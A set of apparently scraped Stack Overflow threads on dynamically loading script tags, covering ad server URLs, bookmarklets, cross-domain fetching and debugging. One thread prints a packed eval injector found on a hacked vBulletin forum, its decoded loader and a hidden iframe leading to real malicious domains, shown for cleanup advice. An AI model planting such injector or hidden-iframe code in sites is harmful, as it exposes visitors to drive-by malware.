So here is the situation, i'm getting an ad from my custom adserver like so
src = 'http://www.adserver.com/www/delivery/ajs.php?zoneid=1&cb=37930400855&charset=UTF-8&loc=http%3A//thissite.com/';
script = document.createElement 'script'
script.type = 'text/javascript'
script.src = src
$('.banner-container').append script
So the problem is the url is correct in the src variable it is correct when it is inserted into the dom
<script type="text/javascript" src="http://www.adserver.com/www/delivery/ajs.php?zoneid=1&cb=37930400855&charset=UTF-8&loc=http%3A//thissite.com/"></script>
But the second the browser tries to fetch it the url changes to
http://www.adserver.comwww/delivery/ajs.php?zoneid=1&cb=37930400855&charset=UTF-8&loc=http%3A//thissite.com/
see right after the .com it strips the / so that comwww runs together, making it throw an error and of course not display what i want. I have tried uri encoding and other little things i had read or seen on stackoverflow to no avail.
Perhaps the problem is on the ad server site. They likely have a bad rewriterule, or a bad internal redirect. I have run your sample code with a different domain and it works fine.
Try visiting the js url in your browser directly, or using a command line tool like curl. Check that it is redirecting. So it is likely that the adserver.com site is redirecting badly. If they have a support contact, you should file a ticket with that company.
I am sorry that this does not directly solve your problem, but I feel that this response is a proper "answer" for this site.
Related
I have a certification and a badge provided by Acclaim. I want to embed it in my personal website but it's not working. here's the code they provided:
<div data-iframe-width="150" data-iframe-height="270" data-share-badge-id="60615e70-6409-4752-9d77-3553a43d13d2" data-share-badge-host="https://www.youracclaim.com"></div>
<script type="text/javascript" async src="//cdn.youracclaim.com/assets/utilities/embed.js"></script>
but even when simply put onto an empty html:5 page, I get the error: Loading failed for the <script> with source “file:///assets/utilities/embed.js”.
What's the problem here? I'm not sure how Acclaim can provide a ready-to-paste script that's just simply not working, nothing shows up on the website. I'm guessing the problem is at the src... part, but don't know how to fix it.
If you're loading your page via file:, then protocol-relative URLs aren't going to work. The script tag has:
src="//cdn.youracclaim.com/assets/utilities/embed.js"
This should be changed to:
src="https://cdn.youracclaim.com/assets/utilities/embed.js"
You'll find though that when you're using an actual web server, this is a non-issue. The reason for the protocol-relative URLs is so that HTTP pages would use the HTTP version, and HTTPS would use the HTTPS version. This method is outdated anyway. HTTPS should be used everywhere, even if you're loading HTTPS JavaScript from an HTTP page.
I have been trying to turn a bookmarklet into a small development environment that I can use for testing some javascript and sending commands easily on the fly and updating the code on my server quickly to see the result. This has half way worked using method's I have found in this site and google however it doesn't seem to work very well and sometimes randomly doesn't work. The end goal is to have a bookmarklet that I can click on from any page and it loads a javascript file I have saved on my server. I have created the following two bookmarklets to try and get this working:
Failed Method 1:
javascript:
var s = document.createElement('script');
s.type='text/javascript';
document.body.appendChild(s);
s.src='//smewth.com/test.js';
void(0);
Method 1 in one line bookmarklet form: javascript: var s = document.createElement('script'); s.type='text/javascript'; document.body.appendChild(s); s.src='//smewth.com/test.js'; void(0);
Failed Method 2:
javascript:(
function(){
var imported = document.createElement('script');
imported.type='text/javascript';
imported.src = 'https://smewth.com/test.js';
document.head.appendChild(imported);
})();
Method 2 in one line bookmarklet form: javascript:( function(){ var imported = document.createElement('script'); imported.type='text/javascript'; imported.src = 'https://smewth.com/test.js'; document.head.appendChild(imported); })();
I got method 1 by decomposing the kickass bookmarklet from (http://kickassapp.com/). The actual one I got from their site works fine on my browser no problems. I even did a direct substitution from the URL they were using to load with my URL. The second method I found while searching on this site and this actually worked for a small while and stopped working for some unknown reason (maybe different browsers). I tried appending this script object to the head and the body on each of them with no improved results.
I created the test.js script just for this post and it contains a simple alert box statement:
$$ [/]# cat test.js
alert("hi");
$$ [/]#
NOTE: When I do this with the code embedded within the the bookmarklet itself without appending it to a head/body object then it works fine such as this:
javascript:%20alert("hi");
I did notice that with both of these methods, the code is actually getting injected into the page however I am not seeing the code is ever executed when I click the bookmark. Does anyone know which method is the best or something similar to do this so I can have javascript load through a page which I update on a remote server (reliably)? Maybe I need to attach the to a different object?
Thank you for your help.
-Jeff
UPDATE: I am showing this works while this site is loaded but it doesn't work when your at a site like google.com. Not sure what the difference is or how to accomodate this, google.com has a head and a body object too. I am showing this works in some sites and in some it doesn't.
I figured this out. There were two things occurring which accounts for the intermittent symptom of this issue. The first issue was that the site which was hosting the code was on a self-signed certificate. I began to notice the issue was occurring only when trying to run this from within secure sites. Then in Chrome I saw a error show up in the console. It would be nice if Firefox gave me a error on the console or something as this was the root of the issue. The second thing I had to do was disable OCSP in Firefox as I used a free certificate for testing purposes.
I also had to use method 1 as described above. Firefox and Chrome both did not like the anonymous function call for some reason. From now on I will refer to Chrome to look for errors in the console as Firefox has proven itself not very useful for this.
My website, 3dsforums.com, has been marked as an attack site for containing malware. According to Google Webmaster Tools, this is the suspected code that has been injected onto every page:
<script>eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c ]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3 1=4.5(\'6\');1.7=\'8://9-a.b/ c.d.1\';3 2=4.e(\'2\')[0];2.f(1);',16,16,'|js|head|var|document|createElement|script|src|http|javascript|collection|in|jquery|compatibility|getElementsByTagName|appendChild'.split('|'),0,{}))</script>
As such, I have two questions:
Is this actually the offending code?
And how do I remove it?
I can't seem to find it via the templates in vBulletin, or through phpmyadmin, so I'm lost as to what I should do.
Thanks for any help.
JS Beautifier decompresses that as this:
var js = document.createElement('script');
js.src = 'http://javascript-collection.in/ jquery.compatibility.js';
var head = document.getElementsByTagName('head')[0];
head.appendChild(js);
It looks suspicious (who would obfuscate that?), so I would assume that yes, it's the problem, and you should remove it.
Edit: Now that the malicious site is back up, I can analyze the rest: it appears to add an iframe:
var iframe = document.createElement('iframe');
iframe.src = 'http://gamessilver.in/in.cgi?walter';
iframe.width = 0;
iframe.height = 0;
iframe.vspace = 0;
iframe.hspace = 0;
iframe.frameborder = 0;
iframe.marginheight = 0;
iframe.marginwidth = 0;
var head = document.getElementsByTagName('head')[0];
head.appendChild(iframe);
Kind of strange to be appending it to the head.
The in.cgi script appears to redirect to Google if the User-Agent is not very exploitable. Otherwise, it redirects to another malicious website.
It continues branching off with many iframes. Many of them do nothing (although at that point, I was only trying the User-Agent for MSIE 6 on WinXP), but I eventually wound up with two Java applets. When I decompiled them, all the names were mangled and I didn't bother to try to figure out what it's doing.
First thing you should do is to change your FTP or SSH login and password.
The above looks like an FTP exploit. Looks like either you are out of date with your OS updates or you are letting whole world write to your files.
Even though you overwrite your files the problem may come back. So I strongly suggest to check
note the last modified date of the files in question.
check your FTP, SSH, Access logs to see if you can find something fishy.
1a. Immediately remove write access to all the site's files. Do this as a precaution just to be safe from a similar attack.
1b. Overwrite your files from Backup
if your apache or any webserver that you are using does not have a pending update.
Check the file permission for you website
Change your FTP password immediately
Advise: change your passwords to something strong. e.g. KLioof*(&^paswl
It was actually hiding in includes/functions.php on lines 6844 and 6845, the two lines were were replacing </head> with their script+</head>
Tough one to find and smart too.
I resolved this problem. You must find and delete Base64 function with shady string in site files. It decode this script from string.
I would like to grab an element from a remote HTML page. As I am requesting data from a different domain I am using the below code to add the source as a script. Yes, very dodgy.
<script type="text/javascript">
var script = document.createElement('script');
script.setAttribute('type', 'text/javascript');
script.setAttribute('src', 'http://remoteDomain.com/page.html');
document.getElementsByTagName('head')[0].appendChild(script);
</script>
The above code fetches and appends the entire page to my document head. Seems to work okay. However now I would like to able to grab an element by ID, or even regex from this source.
Can this be done?
I am aware that the above code is dirty, so I'd be happy to receive any suggestions to clean it up!
Indeed very dodgy... But there are crossdomain AJAX tehniques that you can use. Some help here: http://usejquery.com/posts/9/the-jquery-cross-domain-ajax-guide
The above code fetches and appends the entire page to my document head.
It doesn't really, it just creates a script element of which its src points there.
It looks like you are trying to get around Same Origin Policy.
Can you use a server side proxy?
Browsers go to great lengths to prevent this being done client-side unless the site you're trying to read explicitly opts in.
Otherwise any random web page you visit could read info from your bank account, say.
This is a very "standard" piece of JavaScript code (I've seen it on thousands of examples), but it doesn't work for me:
<head>
<title>Temp</title>
<script type="text/javascript">
function start() {
var newScript = document.createElement('script');
newScript.type = "text/javascript";
newScript.src = "toBeIncluded.js"; // THIS ONE DOES NOT WORK
document.body.appendChild(newScript);
// alert(newScript.contentText);
}
</script>
</head>
<body onload='start()'>
</body>
</html>
In fact I don't get any error, and the tag gets actually appendeded - unfortunately it is completely empty (I check it with the commented alert line). Please consider that the "toBeIncluded.js" file exists, is not empty, and is in the same local directory of this HTML (I'm running everything locally on my PC).
Please help, I've tried lots of possible variations (change directories, include full path, move code to the "body" section, ...) but no success
I would recommend installing the Firebug extension for Firefox. There is also a Firebug Lite script for use in other browsers. They work in different ways but have similar features. As others have mentioned, you may benefit from viewing HTTP transaction information. In Firebug this is available in the "Net" panel. If the browser attempts to load the script, then you should see an item in the Net panel. (Make sure you have "All" or "Script" selected in the Net panel options).
If you see the script request listed, then the outcome of the request should also be listed. If it is "404 Not Found", for example, then the URL did not resolve properly. If it is "200 OK" or "304 Not Modified", then the request was successful. If the item shows a small spinner graphic, then it is still trying to connect to the target server.
If the Net panel indicates that the request was successful, then go to the "HTML" panel. The HTML panel shows you the current state of the document object, so if your start function executed properly, then you'll see a "script" element as a child of the body element.
If the script element is successfully added but no HTTP request is made, then you may have a problem with browser security settings. For example, if the request crosses the boundary of HTTP/HTTPS or http/file protocols, the browser may silently decline it.
Try opening a new browser window and requesting the script URL directly. This should help to rule out a misspelled URL or server connection issues.